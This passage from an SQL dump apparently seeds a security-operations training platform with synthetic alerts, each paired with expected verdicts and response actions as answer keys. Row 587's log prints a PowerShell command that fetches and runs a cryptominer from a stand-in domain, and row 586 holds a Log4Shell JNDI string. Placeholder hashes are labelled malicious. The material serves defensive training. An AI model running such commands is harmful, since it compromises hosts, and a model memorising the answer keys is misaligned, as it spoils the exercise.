Failure\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.2.15\\\",\\\"username\\\":\\\"john_doe\\\",\\\"domain\\\":\\\"CORP\\\",\\\"logon_type\\\":10,\\\"status\\\":\\\"0xC000006A\\\",\\\"sub_status\\\":\\\"0xC0000064\\\",\\\"process_name\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\cmd.exe\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"attempted_action\\\":\\\"Privilege Escalation\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.217Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-10T14:23:45Z\\\",\\\"event_id\\\":4625,\\\"event_type\\\":\\\"Audit Failure\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.2.15\\\",\\\"username\\\":\\\"john_doe\\\",\\\"domain\\\":\\\"CORP\\\",\\\"logon_type\\\":10,\\\"status\\\":\\\"0xC000006A\\\",\\\"sub_status\\\":\\\"0xC0000064\\\",\\\"process_name\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\cmd.exe\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"attempted_action\\\":\\\"Privilege Escalation\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.217Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-10T14:23:45Z\\\",\\\"event_id\\\":4625,\\\"event_type\\\":\\\"Audit Failure\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.2.15\\\",\\\"username\\\":\\\"john_doe\\\",\\\"domain\\\":\\\"CORP\\\",\\\"logon_type\\\":10,\\\"status\\\":\\\"0xC000006A\\\",\\\"sub_status\\\":\\\"0xC0000064\\\",\\\"process_name\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\cmd.exe\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"attempted_action\\\":\\\"Privilege Escalation\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(585, 'Detected Data Anomalies in Backup Systems', 'high', 'Backup System Logs', 'Anomalous data modification detected in backup systems, indicating potential tampering activity aimed at covering tracks post data exfiltration. Changes were made to the backup files shortly after unauthorized access was recorded. Observations indicate the presence of malicious IPs and altered backup files.', 'Impact', 'T1485 - Data Destruction', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T03:15:27Z\",\"event_id\":\"4672\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.105\",\"username\":\"backup_admin\",\"action\":\"modify\",\"file_modified\":\"/backup/weekly-full/2023-10-14.bak\",\"hash_before\":\"5d41402abc4b2a76b9719d911017c592\",\"hash_after\":\"6dcd4ce23d88e2ee9568ba546c007c63\",\"anomalies_detected\":true,\"related_malware\":\"APT29\",\"severity\":\"high\"}', '2026-01-08 22:06:19', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT29 activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host involved in backup operations.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"/backup/weekly-full/2023-10-14.bak\",\"is_critical\":true,\"osint_result\":{\"source\":\"Backup Logs\",\"verdict\":\"suspicious\",\"details\":\"Backup file modified during unauthorized access window.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":false,\"osint_result\":{\"source\":\"Backup Integrity Check\",\"verdict\":\"clean\",\"details\":\"Original hash of the backup file before modification.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"6dcd4ce23d88e2ee9568ba546c007c63\",\"is_critical\":true,\"osint_result\":{\"source\":\"Backup Integrity Check\",\"verdict\":\"malicious\",\"details\":\"Modified hash indicating tampering with the backup file.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'DLP', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.220Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T03:15:27Z\\\",\\\"event_id\\\":\\\"4672\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.105\\\",\\\"username\\\":\\\"backup_admin\\\",\\\"action\\\":\\\"modify\\\",\\\"file_modified\\\":\\\"/backup/weekly-full/2023-10-14.bak\\\",\\\"hash_before\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"hash_after\\\":\\\"6dcd4ce23d88e2ee9568ba546c007c63\\\",\\\"anomalies_detected\\\":true,\\\"related_malware\\\":\\\"APT29\\\",\\\"severity\\\":\\\"high\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.220Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T03:15:27Z\\\",\\\"event_id\\\":\\\"4672\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.105\\\",\\\"username\\\":\\\"backup_admin\\\",\\\"action\\\":\\\"modify\\\",\\\"file_modified\\\":\\\"/backup/weekly-full/2023-10-14.bak\\\",\\\"hash_before\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"hash_after\\\":\\\"6dcd4ce23d88e2ee9568ba546c007c63\\\",\\\"anomalies_detected\\\":true,\\\"related_malware\\\":\\\"APT29\\\",\\\"severity\\\":\\\"high\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.220Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T03:15:27Z\\\",\\\"event_id\\\":\\\"4672\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.105\\\",\\\"username\\\":\\\"backup_admin\\\",\\\"action\\\":\\\"modify\\\",\\\"file_modified\\\":\\\"/backup/weekly-full/2023-10-14.bak\\\",\\\"hash_before\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"hash_after\\\":\\\"6dcd4ce23d88e2ee9568ba546c007c63\\\",\\\"anomalies_detected\\\":true,\\\"related_malware\\\":\\\"APT29\\\",\\\"severity\\\":\\\"high\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.220Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T03:15:27Z\\\",\\\"event_id\\\":\\\"4672\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.105\\\",\\\"username\\\":\\\"backup_admin\\\",\\\"action\\\":\\\"modify\\\",\\\"file_modified\\\":\\\"/backup/weekly-full/2023-10-14.bak\\\",\\\"hash_before\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"hash_after\\\":\\\"6dcd4ce23d88e2ee9568ba546c007c63\\\",\\\"anomalies_detected\\\":true,\\\"related_malware\\\":\\\"APT29\\\",\\\"severity\\\":\\\"high\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.220Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T03:15:27Z\\\",\\\"event_id\\\":\\\"4672\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.105\\\",\\\"username\\\":\\\"backup_admin\\\",\\\"action\\\":\\\"modify\\\",\\\"file_modified\\\":\\\"/backup/weekly-full/2023-10-14.bak\\\",\\\"hash_before\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"hash_after\\\":\\\"6dcd4ce23d88e2ee9568ba546c007c63\\\",\\\"anomalies_detected\\\":true,\\\"related_malware\\\":\\\"APT29\\\",\\\"severity\\\":\\\"high\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(586, 'Initial Access: JNDI Injection Detected', 'critical', 'Web Application Firewall Logs', 'Anomalous traffic patterns have been identified which indicate a JNDI injection attempt targeting a critical Java-based application. The attempt is likely leveraging the Log4Shell vulnerability for initial access.', 'Exploit', 'T1190', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-15T14:32:10Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.75\",\"request_uri\":\"/vulnerable-endpoint\",\"http_method\":\"GET\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36\",\"referrer\":\"http://example.com/malicious-page\",\"jndi_string\":\"ldap://203.0.113.45:1389/Exploit\",\"malicious_indicator\":\"exploit.jar\",\"transaction_id\":\"abc123def456ghi789\",\"status_code\":200}', '2026-01-08 22:09:09', '2026-02-16 18:07:28', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with known exploitation attempts\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.75\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Asset Database\",\"verdict\":\"internal\",\"details\":\"Critical Java-based application server\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"exploit.jar\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Repository\",\"verdict\":\"malicious\",\"details\":\"Filename associated with Log4Shell exploitation\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"escalate\"]}', 'Advanced', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(587, 'Execution: Cryptominer Deployment Identified', 'high', 'Endpoint Detection and Response (EDR) Logs', 'The EDR system identified the execution of a known cryptomining payload. The attacker utilized their access to deploy the cryptominer \'xmrig.exe\' on the target system, exploiting system resources for illicit mining activities. The activity was flagged due to anomalous process creation and outbound connections to a known mining pool.', 'Malware', 'T1059.001 - Command and Scripting Interpreter: PowerShell', 1, 'new', NULL, '{\"timestamp\":\"2023-10-20T14:52:45Z\",\"event_type\":\"process_creation\",\"host_ip\":\"192.168.1.15\",\"process_name\":\"powershell.exe\",\"command_line\":\"powershell -Command \\\"Invoke-WebRequest -Uri http://maliciousdomain.com/malware/xmrig.exe -OutFile C:\\\\Users\\\\Public\\\\xmrig.exe; Start-Process C:\\\\Users\\\\Public\\\\xmrig.exe\\\"\",\"destination_ip\":\"203.0.113.45\",\"file_hash\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"username\":\"compromised_user\",\"file_name\":\"xmrig.exe\",\"external_ip\":\"198.51.100.23\"}', '2026-01-08 22:09:13', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known cryptomining pool IP.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Identified as a cryptominer executable.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"xmrig.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"File Analysis\",\"verdict\":\"suspicious\",\"details\":\"Commonly used name for cryptomining software.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Logs\",\"verdict\":\"internal\",\"details\":\"User account showing anomalous behavior.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(588, 'Persistence: Backdoor Creation Alert', 'high', 'System Event Logs', 'To ensure continued access, a sophisticated backdoor is deployed, blending into normal traffic and evading basic security measures.', 'Backdoor', 'T1547 - Boot or Logon Autostart Execution', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T15:23:43Z\",\"event_id\":\"4624\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.15\",\"username\":\"compromised_user\",\"filename\":\"svchost.exe\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"event_description\":\"New service installed for persistence.\",\"service_name\":\"WinSvcHelper\",\"service_path\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"}', '2026-01-08 22:09:13', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with APT activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised host.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"Account used in suspicious logon activities.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"svchost.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Reputation Service\",\"verdict\":\"malicious\",\"details\":\"Malicious file mimicking a legitimate Windows process.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malware.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.224Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T15:23:43Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"filename\\\":\\\"svchost.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"event_description\\\":\\\"New service installed for persistence.\\\",\\\"service_name\\\":\\\"WinSvcHelper\\\",\\\"service_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\svchost.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.224Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T15:23:43Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"filename\\\":\\\"svchost.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"event_description\\\":\\\"New service installed for persistence.\\\",\\\"service_name\\\":\\\"WinSvcHelper\\\",\\\"service_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\svchost.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.224Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T15:23:43Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"filename\\\":\\\"svchost.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"event_description\\\":\\\"New service installed for persistence.\\\",\\\"service_name\\\":\\\"WinSvcHelper\\\",\\\"service_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\svchost.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.224Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T15:23:43Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"filename\\\":\\\"svchost.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"event_description\\\":\\\"New service installed for persistence.\\\",\\\"service_name\\\":\\\"WinSvcHelper\\\",\\\"service_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\svchost.exe\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.224Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T15:23:43Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"filename\\\":\\\"svchost.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"event_description\\\":\\\"New service installed for persistence.\\\",\\\"service_name\\\":\\\"WinSvcHelper\\\",\\\"service_path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\svchost.exe\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(589, 'Lateral Movement: Unauthorized Access Detected', 'high', 'Network Traffic Analysis', 'Attackers are attempting to expand their foothold by moving laterally within the network, targeting sensitive data stores and critical systems. Unauthorized access was detected from an external IP to multiple internal systems.', 'Lateral Movement', 'T1078: Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:12:34Z\",\"event_id\":\"LM-20231005-001\",\"source_ip\":\"203.0.113.45\",\"destination_ips\":[\"10.0.5.25\",\"192.168.1.14\"],\"username\":\"jdoe_admin\",\"malware_hash\":\"e99a18c428cb38d5f260853678922e03\",\"detected_action\":\"User jdoe_admin accessed multiple systems within a short time frame\",\"file_accessed\":\"confidential_financial_data.xlsx\",\"alert\":\"Suspicious lateral movement detected from external IP 203.0.113.45 using compromised credentials.\"}', '2026-01-08 22:09:13', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with previous attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.5.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset Management\",\"verdict\":\"internal\",\"details\":\"Local network IP, no suspicious activity recorded.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.1.14\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset Management\",\"verdict\":\"internal\",\"details\":\"Local network IP, no suspicious activity recorded.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe_admin\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"suspicious\",\"details\":\"User account involved in abnormal access patterns.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malware used for credential theft.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(590, 'Exfiltration: Data Transfer Anomaly', 'critical', 'Data Loss Prevention (DLP) Systems', 'Anomalous data transfer activities are detected, indicating potential exfiltration of sensitive information to external servers controlled by the attackers. The data transfer volume and destination IPs suggest a sophisticated exfiltration attempt.', 'Data Exfiltration', 'T1048 - Exfiltration Over Alternative Protocol', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-15T14:23:45Z\",\"event_id\":\"DLP-20231015142345-001\",\"source_ip\":\"10.0.0.5\",\"destination_ip\":\"203.0.113.45\",\"user\":\"jdoe\",\"filename\":\"financial_report_q3_2023.xlsx\",\"hash\":\"3a7bd3e2360a7bb9d8d1d1f2e6a8e4d2\",\"data_volume\":\"2GB\",\"protocol\":\"HTTPS\",\"action_taken\":\"Alerted\",\"description\":\"Detected large data transfer to external IP not whitelisted.\"}', '2026-01-08 22:09:13', '2026-02-16 18:05:54', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT Database\",\"verdict\":\"malicious\",\"details\":\"Known exfiltration endpoint associated with previous attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal corporate workstation.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"clean\",\"details\":\"Employee: John Doe, Sales Department.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"financial_report_q3_2023.xlsx\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal DLP\",\"verdict\":\"suspicious\",\"details\":\"Contains sensitive financial information.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"3a7bd3e2360a7bb9d8d1d1f2e6a8e4d2\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Hashing Database\",\"verdict\":\"suspicious\",\"details\":\"File hash not recognized in the internal database.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Advanced', 'DLP', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.226Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"event_id\\\":\\\"DLP-20231015142345-001\\\",\\\"source_ip\\\":\\\"10.0.0.5\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"financial_report_q3_2023.xlsx\\\",\\\"hash\\\":\\\"3a7bd3e2360a7bb9d8d1d1f2e6a8e4d2\\\",\\\"data_volume\\\":\\\"2GB\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action_taken\\\":\\\"Alerted\\\",\\\"description\\\":\\\"Detected large data transfer to external IP not whitelisted.\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.226Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"event_id\\\":\\\"DLP-20231015142345-001\\\",\\\"source_ip\\\":\\\"10.0.0.5\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"financial_report_q3_2023.xlsx\\\",\\\"hash\\\":\\\"3a7bd3e2360a7bb9d8d1d1f2e6a8e4d2\\\",\\\"data_volume\\\":\\\"2GB\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action_taken\\\":\\\"Alerted\\\",\\\"description\\\":\\\"Detected large data transfer to external IP not whitelisted.\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.226Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 